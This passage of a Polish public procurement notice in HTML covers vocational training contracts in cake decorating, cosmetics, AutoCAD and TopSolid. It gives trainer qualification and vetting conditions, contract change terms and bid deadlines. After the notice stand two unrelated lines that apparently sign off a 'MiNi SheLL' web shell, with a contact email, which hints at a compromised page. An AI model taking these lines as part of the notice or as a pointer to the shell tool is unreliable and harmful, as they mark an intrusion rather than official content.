przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34;Torty artystyczne z elementami uwzględniającymi za-sady zrównoważonego rozwoju&#34;, w wymiarze 50h <br/>zajęć teoretyczno-praktycznych (60 min.), w jednostce - Hufiec Pracy w Giżycku<br/>ul. 1 Maja 30<br/>11-500 Giżycko, dla 10 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34;Kosmetyczka z elementami wizażu i stylizacji paznokci z elementami uwzględniającymi zasady zrównoważonego rozwoju&#34;, w wymiarze 90h <br/>zajęć teoretyczno-praktycznych (60 min.), w jednostce - Ośrodek Szkolenia i Wy-chowania OHP w Ostródzie<br/>ul. Sienkiewicza 9<br/>14-100 Ostróda, dla 10 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85300000-2 - Usługi pracy społecznej i podobnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34;AutoCAD poziom podstawowy z elementami uwzględniającymi zasady zrównoważonego rozwoju&#34;, w wymiarze 28h <br/>zajęć teoretyczno-praktycznych (60 min.), w jednostce -Hufiec Pracy w Elblągu<br/>ul. Związku Jaszczurczego 15<br/>82-300 Elbląg, dla 10 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie szkolenia zawodowego &#34; TopSolid poziom podstawowy z elementami uwzględniającymi zasady zrównoważonego rozwoju&#34;, w wymiarze 28h <br/>zajęć teoretyczno-praktycznych (60 min.), w jednostce -Hufiec Pracy w Elblągu<br/>ul. Związku Jaszczurczego 15<br/>82-300 Elbląg, dla 10 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">67 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu:<br/>1.1.	Zamawiający nie określa warunków udziału w postępowaniu w zakresie:<br/>a)	posiadania zdolności do występowania w obrocie gospodarczym,<br/>b)	posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>c)	sytuacji finansowej lub ekonomicznej.<br/><br/>1.2.	Zdolność techniczna lub zawodowa<br/><br/>a)	dysponowanie osobami<br/><br/>Opis spełnienia warunku:<br/><br/>Warunek postawiony dla części 1 i 2.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w zawodzie mechanik pojazdów samochodo-wych, lakiernik, auto detailer lub pokrewne (np. studia z zakresu technologii mo-toryzacyjnej, chemii samochodowej, ochrony środowiska; studium/technikum samochodowe) lub certyfikaty/zaświadczenia z kursów auto detailingu, kosme-tyki samochodowej. Minimalne doświadczenie zawodowe wykazanej osoby w prowadzeniu zajęć grupowych (szkoleń, warsztatów) nie powinno być krótsze niż 2 lata (licząc od daty uzyskania ww. kwalifikacji do daty składania ofert). Ponadto osoba ta nie może być karana za przestępstwa na tle seksualnym oraz nie może figurować w Rejestrze Sprawców Przestępstw na Tle Seksualnym z do-stępem ograniczonym, zgodnie z ustawą z dnia 13 maja 2016 r. o przeciwdziała-niu zagrożeniom przestępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2023 r. poz. 1304, ze zm.).<br/>Warunek postawiony dla części 3.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w zawodzie kucharz, technik żywienia i usług gastronomicznych lub pokrewne (np. studia z zakresu technologii żywności, die-tetyki, gastronomii; studium/technikum gastronomiczne; szkoła policealna w za-kresie usług gastronomicznych) lub certyfikaty/zaświadczenia z kursów gastro-nomicznych. Minimalne doświadczenie zawodowe wykazanej osoby w prowa-dzeniu zajęć grupowych (szkoleń, warsztatów) nie powinno być krótsze niż 2 la-ta (licząc od daty uzyskania ww. kwalifikacji do daty składania ofert). Ponadto osoba ta nie może być karana za przestępstwa na tle seksualnym oraz nie może figurować w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, zgodnie z ustawą z dnia 13 maja 2016 r. o przeciwdziałaniu za-grożeniom przestępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2023 r. poz. 1304, ze zm.)<br/>Warunek postawiony dla części 4.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w obszarze gastronomii, hotelarstwa lub turysty-ki. (np. studia z zakresu hotelarstwa, turystyki, gastronomii; studium/technikum gastronomiczne; szkoła policealna w zakresie obsługi gastronomicznej) lub certy-fikaty/zaświadczenia z kursów baristycznych. Minimalne doświadczenie zawo-dowe wykazanej osoby w prowadzeniu zajęć grupowych (szkoleń, warsztatów) nie powinno być krótsze niż 2 lata (licząc od daty uzyskania ww. kwalifikacji do daty składania ofert). Ponadto osoba ta nie może być karana za przestępstwa na tle seksualnym oraz nie może figurować w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, zgodnie z ustawą z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2023 r. poz. 1304, ze zm.)<br/>Warunek postawiony dla części 5.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w zawodzie fryzjer, barber lub pokrewne (np. studia z zakresu kosmetologii, stylizacji włosów; studium/technikum fryzjerskie; szkoła policealna w zakresie fryzjerstwa/barberingu) lub certyfika-ty/zaświadczenia z kursów barberingu. Minimalne doświadczenie zawodowe wykazanej osoby w prowadzeniu zajęć grupowych (szkoleń, warsztatów) nie powinno być krótsze niż 2 lata (licząc od daty uzyskania ww. kwalifikacji do daty składania ofert). Ponadto osoba ta nie może być karana za przestępstwa na tle seksualnym oraz nie może figurować w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, zgodnie z ustawą z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2023 r. poz. 1304, ze zm.)<br/>Warunek postawiony dla części 6.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w zawodzie mechanik, logistyk, technik trans-portu lub pokrewne (np. studia z zakresu logistyki, transportu, mechaniki; stu-dium/technikum mechaniczne, logistyczne; szkoła policealna w zakresie transpor-tu i logistyki) lub certyfikaty/zaświadczenia z kursów operatora wózków jez-dniowych specjalizowanych. Minimalne doświadczenie zawodowe wykazanej osoby w prowadzeniu zajęć grupowych (szkoleń, warsztatów) nie powinno być krótsze niż 2 lata (licząc od daty uzyskania ww. kwalifikacji do daty składania ofert).<br/>Warunek postawiony dla części 7.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w zawodzie cukiernik, kucharz lub pokrewne (np. studia z zakresu technologii żywności, dietetyki, gastronomii; stu-dium/technikum gastronomiczne; szkoła policealna w zakresie cukiernictwa) lub certyfikaty/zaświadczenia z kursów cukierniczych, dekoracji tortów. Minimalne doświadczenie zawodowe wykazanej osoby w prowadzeniu zajęć grupowych (szkoleń, warsztatów) nie powinno być krótsze niż 2 lata (licząc od daty uzyska-nia ww. kwalifikacji do daty składania ofert). Ponadto osoba ta nie może być karana za przestępstwa na tle seksualnym oraz nie może figurować w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, zgodnie z ustawą z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2023 r. poz. 1304, ze zm.)<br/>Warunek postawiony dla części 8.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w zawodzie kosmetyczka, technik usług kosme-tycznych lub pokrewne (np. studia z zakresu kosmetologii, wizażu, stylizacji; studium/technikum kosmetyczne; szkoła policealna w zakresie kosmetyki, wiza-żu, stylizacji paznokci) lub certyfikaty/zaświadczenia z kursów kosmetycznych, wizażu, stylizacji paznokci.<br/>Minimalne doświadczenie zawodowe wykazanej osoby w prowadzeniu zajęć grupowych (szkoleń, warsztatów) nie powinno być krótsze niż 2 lata (licząc od daty uzyskania ww. kwalifikacji do daty składania ofert). Ponadto osoba ta nie może być karana za przestępstwa na tle seksualnym oraz nie może figurować w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, zgodnie z ustawą z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom prze-stępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2023 r. poz. 1304, ze zm.)<br/>Warunek postawiony dla części 9. <br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w zawodzie technik budownictwa, inżynier, ar-chitekt, technik mechanik, grafik komputerowy lub pokrewne (np. studia z za-kresu architektury, inżynierii, mechaniki, projektowania wspomaganego kompu-terowo; studium/technikum budowlane, mechaniczne; szkoła policealna w zakre-sie projektowania CAD) lub certyfikaty/zaświadczenia z kursów AutoCAD. Mi-nimalne doświadczenie zawodowe wykazanej osoby w prowadzeniu zajęć gru-powych (szkoleń, warsztatów) nie powinno być krótsze niż 2 lata (licząc od daty uzyskania ww. kwalifikacji do daty składania ofert). Ponadto osoba ta nie może być karana za przestępstwa na tle seksualnym oraz nie może figurować w Reje-strze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, zgodnie z ustawą z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom prze-stępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2023 r. poz. 1304, ze zm.)<br/>Warunek postawiony dla części 10.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej jedną oso-bą, która posiada wykształcenie w zawodzie technik mechanik, technik budowy maszyn, inżynier mechanik, technolog CNC lub pokrewne (np. studia z zakresu inżynierii mechanicznej, mechatroniki, technologii obróbki skrawaniem; stu-dium/technikum mechaniczne, mechatroniczne; szkoła policealna w zakresie pro-jektowania technicznego) lub certyfikaty/zaświadczenia z kursów TopSolid, CAD/CAM. Minimalne doświadczenie zawodowe wykazanej osoby w prowa-dzeniu zajęć grupowych (szkoleń, warsztatów) nie powinno być krótsze niż 2 la-ta (licząc od daty uzyskania ww. kwalifikacji do daty składania ofert). Ponadto osoba ta nie może być karana za przestępstwa na tle seksualnym oraz nie może figurować w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, zgodnie z ustawą z dnia 13 maja 2016 r. o przeciwdziałaniu za-grożeniom przestępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2023 r. poz. 1304, ze zm.)<br/><br/>Dotyczy wszystkich części zamówienia - Wykazana osoba musi wykonywać przedmiot zamówienia, jej zamiana jest możliwa wyłącznie w wyjątkowych sy-tuacjach (np. choroba). W takich sytuacjach Wykonawca zobowiązany jest za-pewnić zastępstwo osoby spełniającej ww. wymogi.<br/><br/>Warunek jest spełniony, jeżeli wykonawcy wspólnie ubiegający się o zamówienie albo wyko-nawca (ew. wykonawcy wspólnie ubiegający się o zamówienie) wraz z podmiotem na poten-cjale którego polega spełniają warunek łącznie (możliwość łączenia potencjałów) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców lub w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty należy dołączyć pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego w formie oryginału lub notarialnie poświadczonej kopii lub kopii po-świadczonej za zgodność z oryginałem przez osobę umocowaną (nie przez osobę której dotyczy upoważnienie) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszcza się zmiany treści Umowy we wskazanym zakresie:<br/>a)	zmiany terminu realizacji przedmiotu Umowy, o którym mowa w § 2 w przypadku:<br/>a.a.) zmiany harmonogramu realizacji projektu,<br/>a.b.) wystąpienia okoliczności, które mają wpływ na realizację Umowy, a których stronny nie były w stanie przewidzieć pomimo zachowania należytej staranności;<br/>b)	zmiana miejsca realizacji projektu w przypadku zmiany siedziby jednostki realizującej projekt;<br/>c)	zmiana liczby uczestników.<br/>2.	Ponad zmiany określone w ust. 1 dopuszcza się wprowadzenie zmian redakcyjnych Umowy, zmian organizacyjnych stron, np. zmiana reprezentacji lub siedziby firmy, zmian danych stron ujawnionych w rejestrach publicznych, zmian zaistniałych w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej Umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.<br/>3.	Uzgodniona przez „Wykonawcę” i „Zamawiającego” zmiana wymaga formy pisemnej pod rygorem nieważności w postaci aneksu.<br/>4.	Zmiany nie mogą wykraczać poza zakres świadczenia określonego w Umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-07 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e - zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com